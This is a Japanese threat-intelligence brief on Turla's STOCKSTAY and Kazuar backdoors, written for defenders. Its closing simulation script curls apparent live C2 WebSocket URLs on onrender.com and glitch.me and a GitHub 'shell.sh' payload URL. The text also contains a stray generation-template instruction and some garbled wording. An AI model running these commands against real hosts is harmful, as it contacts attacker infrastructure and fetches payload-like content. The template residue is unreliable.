SOC Prime Bias: 重大

14 Jul 2026 15:35 UTC

Turla(シークレット・ブリザード):STOCKSTAYとKazuarバックドアの解説

Author Photo
SOC Prime Team linkedin icon フォローする
Turla(シークレット・ブリザード):STOCKSTAYとKazuarバックドアの解説
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

Turlaは長期間活動しているロシアに関連付けられたAPTグループで、FSBに関連し、政府や軍事のターゲットに対するサイバースパイ活動で知られています。このグループは、STOCKSTAYやKazuarバックドアを含むカスタムマルウェアに依存して、侵害された環境での長期的なアクセスを維持しています。また、GitHubやCloudflareなどの正当なクラウドサービスを頻繁に悪用して、コマンド・アンド・コントロールのトラフィックを隠蔽します。

調査

このレポートは、Turlaのマルウェアツールセットの進化を、STOCKSTAYおよびKazuarファミリーを中心に検討します。グループのインフラストラクチャ乗っ取り技術、コマンド・アンド・コントロールのためのサーバーレスプラットフォームの利用、WinRARパス移動のような脆弱性の悪用能力について分析しています。調査はまた、サンドボックス分析への露出を減らすための環境キーの使用を含めています。

緩和

企業は、トラフィックパターンが異常に見える場合には、GitHubやCloudflareなどの信頼されたWebプラットフォームの不正使用に対する強化された監視を展開するべきです。また、 CVE-2025-8088 のような脆弱性の迅速なパッチ適用は、不正なファイル書き込みを防ぐために不可欠です。防御者はまた、不正なルート証明書のインストールやTurlaの活動を示す可能性がある疑わしいPowerShellやVBScriptの実行を監視する必要があります。

対応

Turlaの活動が検出された場合、対応者は影響を受けたホストを隔離し、不正なローカル管理者アカウントの調査を行うべきです。プロセスツリーの詳細なレビューを行い、NVIDIAやBrotherプリンターのユーティリティなどの正当なバイナリを使用したDLLサイドローディングを明らかにすべきです。ネットワークのテレメトリーも異常なWebSocketトラフィックについてチェックされるべきであり、機械の信頼ストアを疑わしい証明書の変更のためにレビューする必要があります。

攻撃フロー

シミュレーション実行

前提条件: テレメトリー&ベースラインの前フライトチェックが完了していること。

論理: このセクションでは、検出規則をトリガーするために設計された敵の技術 (TTP) の正確な実行を詳細に説明します。コマンドとナarractiveは、識別されたTTPsを直接反映し、検出論理によって期待される正確なテレメトリーを生成することを目指します。抽象的または無関係な例は、誤診につながります。

  • 攻撃ナラティブ&コマンド: 敵は攻撃の足がかりを確立し、現在C2通信を確立しようとしています。彼らは“living-off-the-land”アプローチを使い、サーバーレスプラットフォームに接続することで検出を回避しようとします。 onrender.com WebSocket接続を通じて。 同時に、彼らは2次ステージのペイロードを開発者のトラフィックに紛れ込ませるために公開GitHubリポジトリから引き出そうとしています。このシミュレーションでは curl and wscat (利用可能な場合) または標準のWebリクエストを使用して、検出論理で定義された特定のURLパターンを生成します。

  • 回帰テストスクリプト: [Provide the exact, self-contained, and executable code snippet for the simulation.]

    #!/bin/bash
    # STOCKSTAY C2 検出検証のためのシミュレーションスクリプト
    
    echo "[+] シミュレーション開始: STOCKSTAY C2 TTPs"
    
    # 1. トリガー: Renderを介したWebSocket C2(特定のURL)
    echo "[*] 悪意のあるRender URLへのWebSocket接続をシミュレート..."
    curl -k "wss://google-ai-labs-it.onrender.com/ws"
    
    # 2. トリガー: Glitchを介したWebSocket C2(特定のURL)
    echo "[*] 悪意のあるGlitch URLへのWebSocket接続をシミュレート..."
    curl -k "wss://wool-basalt-clock.glitch.me/ws"
    
    # 3. トリガー: GitHubステージング(広域ドメインマッチ)
    echo "[*] GitHubを介したペイロードのステージングをシミュレート..."
    curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh"
    
    echo "[+] シミュレーション完了。 SIEMにアラートがあるか確認してください。"
  • クリーンアップコマンド:

    # このシミュレーションによりホスト上に永続的なアーティファクトは作成されません。
    # 作成された場合は一時的なbashファイルを削除してください。
    rm -f simulation_stockstay.sh